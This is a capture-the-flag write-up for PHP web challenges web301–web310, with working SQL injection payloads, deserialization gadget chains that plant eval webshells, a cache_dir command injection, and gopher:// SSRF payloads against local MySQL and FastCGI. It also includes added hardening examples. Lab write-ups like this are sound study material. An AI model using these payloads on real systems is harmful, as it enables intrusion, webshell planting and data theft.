web301
Vulnerable point: checklogin.php
$sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;";
Dump the username and password with sqlmap, log in, and get the flag.
web302
Changed part:
if(!strcasecmp(sds_decode($userpwd),$row['sds_password'])){
sqlmap dumped the username and password, but for some reason login did not work, so I tried writing a webshell instead.
Payload:
userid=a'%20union%20select%20"<?php%20phpinfo();?>"%20into%20outfile%20"/var/www/html/a.php"%23&userpwd=b
Visit a.php.
Write a one-liner shell and then view the file.
web303
Log in with the weak credentials admin / admin.
Then audit the code: the data submitted in dptadd.php is stored in the database via INSERT without any filtering, so try INSERT injection.
Payloads:
123' and updatexml(1,concat(0x7e,database()),0)#
123' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)#
123' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='sds_fl9g'),0x7e),1)#
123' and updatexml(1,concat(0x7e,substr((select group_concat(flag) from sds_fl9g),1,30),0x7e),1)#
123' and updatexml(1,concat(0x7e,substr((select group_concat(flag) from sds_fl9g),30,60),0x7e),1)#
web304
The injection point is the same as in the previous challenge; just follow the previous payloads.
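Both the SELECT in checklogin.php (web301/302) and the INSERT in dptadd.php (web303/304) splice user input straight into SQL text, and web302 compares passwords with strcasecmp(). The following hardened version is an added example, not the challenge's code; it assumes $conn is the mysqli connection from conn.php, that sds_password holds a password_hash() value instead of sds_decode() output, and the sds_dpt table and its columns are hypothetical names for the department INSERT:

```php
<?php
// Added hardening example for checklogin.php / dptadd.php; not the challenge's code.
// Assumes $conn is the mysqli connection from conn.php and that
// sds_user.sds_password stores a password_hash() value.
require 'conn.php';

function check_login(mysqli $conn, string $username, string $password): bool
{
    // The username is bound as a parameter, never spliced into the SQL text,
    // so a value such as a' union select ... into outfile ... # stays a plain string.
    $stmt = $conn->prepare(
        'SELECT sds_password FROM sds_user WHERE sds_username = ? ORDER BY id LIMIT 1'
    );
    if ($stmt === false) {
        return false;
    }
    $stmt->bind_param('s', $username);
    $stmt->execute();
    $stmt->bind_result($storedHash);
    $found = ($stmt->fetch() === true);
    $stmt->close();
    // Constant-time hash check instead of strcasecmp() on a decoded password.
    return $found && password_verify($password, (string) $storedHash);
}

function add_department(mysqli $conn, string $name, string $address): bool
{
    // Same pattern for the INSERT in dptadd.php (table/columns are hypothetical):
    // updatexml()/concat() payloads cannot alter the statement because the
    // values are parameters, not part of its text.
    $stmt = $conn->prepare('INSERT INTO sds_dpt (sds_name, sds_address) VALUES (?, ?)');
    if ($stmt === false) {
        return false;
    }
    $stmt->bind_param('ss', $name, $address);
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}

if (check_login($conn, $_POST['userid'] ?? '', $_POST['userpwd'] ?? '')) {
    session_start();
    $_SESSION['login'] = $_POST['userid'];
    header('Location: index.php');
} else {
    header('Location: login.php');
}
```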
web305
Code audit shows a deserialization sink where username and password are controllable; use file_put_contents to write a one-liner shell.
<?php
class user{
    public $username;
    public $password;
    public function __construct($u,$p){
        $this->username=$u;
        $this->password=$p;
    }
    public function __destruct(){
        file_put_contents($this->username, $this->password);
    }
}
$a = new user('1.php',"<?php @eval(\$_POST[1]);?>");
echo urlencode(serialize($a));
The trigger is in checklogin.php: set a cookie named user.
After writing the shell I did not see a flag file; connected with AntSword and still could not find it. Then I noticed the conn file contains the MySQL username and password, tried connecting to MySQL using the mysqli type, and the connection succeeded.
The flag is in the database.
web306
Auditing the code, file_put_contents is found in the class file, and all properties of that class are controllable.
Then look for where close() is called.
After reading these two key pieces of code the exploitation path is clear: the log class in class.php writes the file, dao.php calls close(), and the entry point is index.php.
<?php
class log{
    public $title='1.php';
    public $info='<?php eval($_POST[1]);?>';
}
class dao{
    private $conn;
    function __construct(){
        $this->conn=new log();
    }
}
$d =new dao();
echo base64_encode(serialize($d));
?>
web307
At first, after reading the code, I thought it was no different from the previous challenge, but the payload did not work. Reading it again, I found that class.php had changed,
so the previous method no longer works. Then I saw shell_exec in dao.php,
which gives command execution. On instantiation, $this->config=new config().
The config file:
The cache_dir of the config class is controllable.
<?php
class config{
    public $cache_dir = 'cache/*;cat /var/www/html/flag.php > /var/www/html/1.txt;';
}
class dao
{
    private $config;
    public function __construct()
    {
        $this->config = new config();
    }
}
echo base64_encode(serialize(new dao()));
After building the payload, find the trigger: global search for clearCache.
The trigger is found in logout.php.
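web305 to web307 all start from unserialize() of the user cookie, which lets attacker-controlled log, dao and config objects reach __destruct(), close() and clearCache(). The following is an added hardening example, not the challenge's code: the cookie is replaced by HMAC-signed JSON, and where unserialize() cannot be removed, allowed_classes is set to false; $secret is a placeholder that would be loaded from server-side config:

```php
<?php
// Added hardening example for the user cookie in checklogin.php; not the challenge's code.
// $secret is a placeholder: load a random server-side secret from config.
function make_user_cookie(array $data, string $secret): string
{
    $payload = base64_encode(json_encode($data));
    $mac = hash_hmac('sha256', $payload, $secret);
    return $payload . '.' . $mac;
}

function read_user_cookie(string $cookie, string $secret): ?array
{
    $parts = explode('.', $cookie, 2);
    if (count($parts) !== 2) {
        return null;
    }
    [$payload, $mac] = $parts;
    // Verify the signature before touching the contents: a forged cookie is
    // rejected here rather than parsed.
    if (!hash_equals(hash_hmac('sha256', $payload, $secret), $mac)) {
        return null;
    }
    $raw = base64_decode($payload, true);
    $data = $raw === false ? null : json_decode($raw, true);
    return is_array($data) ? $data : null;
}

// If unserialize() of untrusted input cannot be removed, refuse all objects:
// allowed_classes => false turns every object into __PHP_Incomplete_Class, so
// no __destruct()/__wakeup() of log, dao or config ever runs.
function safe_unserialize(string $blob)
{
    return unserialize($blob, ['allowed_classes' => false]);
}

$secret = 'replace-with-a-random-server-side-secret'; // placeholder
$user = read_user_cookie($_COOKIE['user'] ?? '', $secret);
if ($user === null) {
    header('Location: login.php');
    exit;
}
```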
web308
A checkVersion() has been added.
First find the trigger: the newly added code must be it. Global search for checkVersion; it is in index.php.
The config.php file:
This URL should be SSRF, and MySQL has no password, so try SSRF against MySQL and use Gopherus to write a shell.
Exploit:
<?php
class dao{
    private $config;
    public function __construct(){
        $this->config=new config();
    }
}
class config{
    public $update_url = 'gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%46%00%00%00%03%73%65%6c%65%63%74%20%22%3c%3f%70%68%70%20%40%65%76%61%6c%28%24%5f%50%4f%53%54%5b%31%5d%29%3b%3f%3e%22%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%22%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%31%2e%70%68%70%22%01%00%00%00%01';
}
$d= new dao();
echo base64_encode(serialize($d));
?>
web309
The challenge hints that the web308 method no longer works since MySQL now has a password; SSRF against FastCGI instead.
Exploit:
<?php
class dao{
    private $config;
    public function __construct(){
        $this->config=new config();
    }
}
class config{
    public $update_url = 'gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%04%04%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH58%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/var/www/html/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00%3A%04%00%3C%3Fphp%20system%28%27whoami%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00';
}
$d= new dao();
echo base64_encode(serialize($d));
?>
Then directly read the file in the directory that contains the flag.
web310
Still attacking FastCGI.
Exploit:
<?php
class dao{
    private $config;
    public function __construct(){
        $this->config=new config();
    }
}
class config{
    public $update_url = 'gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%04%04%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH58%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/var/www/html/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00%3A%04%00%3C%3Fphp%20system%28%27whoami%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00';
}
$d= new dao();
echo base64_encode(serialize($d));
?>
But reading the flag file returned nothing, so I tried the find command to locate the flag file.
Reading that file also returned nothing; then I found it is a directory, so I listed everything inside it.
Alternatively, write a one-liner shell and connect with AntSword to search.
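In web308 to web310 the sink is config->update_url: checkVersion() fetches whatever URL the deserialized config carries, so gopher:// can speak raw MySQL (3306) or FastCGI (9000) to localhost. The following is an added hardening example, not the challenge's code; the allowlisted host is a placeholder, and fetching via file_get_contents is an assumption about how checkVersion() retrieves the URL:

```php
<?php
// Added hardening example for the checkVersion() fetch of config->update_url;
// not the challenge's code. ALLOWED_UPDATE_HOSTS is a placeholder allowlist.
const ALLOWED_UPDATE_HOSTS = ['updates.example.invalid'];

function is_internal_ip(string $ip): bool
{
    // With NO_PRIV_RANGE | NO_RES_RANGE, filter_var() rejects 10/8, 172.16/12,
    // 192.168/16, 127/8, 169.254/16, ::1 etc.; anything rejected counts as internal.
    return filter_var($ip, FILTER_VALIDATE_IP,
        FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) === false;
}

function safe_update_url(string $url): ?string
{
    $p = parse_url($url);
    if ($p === false || !isset($p['scheme'], $p['host'])) {
        return null;
    }
    $scheme = strtolower($p['scheme']);
    // gopher://, file://, dict:// and the rest are refused; only http(s) is allowed.
    if ($scheme !== 'http' && $scheme !== 'https') {
        return null;
    }
    if (!in_array(strtolower($p['host']), ALLOWED_UPDATE_HOSTS, true)) {
        return null;
    }
    // Pin the port so the fetch can never reach 3306 (MySQL) or 9000 (FastCGI).
    $port = $p['port'] ?? ($scheme === 'https' ? 443 : 80);
    if ($port !== 80 && $port !== 443) {
        return null;
    }
    // Also reject hosts that resolve to loopback or private addresses.
    foreach (gethostbynamel($p['host']) ?: [] as $ip) {
        if (is_internal_ip($ip)) {
            return null;
        }
    }
    return $url;
}

function check_version(string $update_url): ?string
{
    $url = safe_update_url($update_url);
    if ($url === null) {
        return null;
    }
    // No redirects: a 302 to gopher:// or 127.0.0.1 would bypass the checks above.
    $ctx = stream_context_create(['http' => ['timeout' => 5, 'follow_location' => 0]]);
    $body = @file_get_contents($url, false, $ctx);
    return $body === false ? null : $body;
}
```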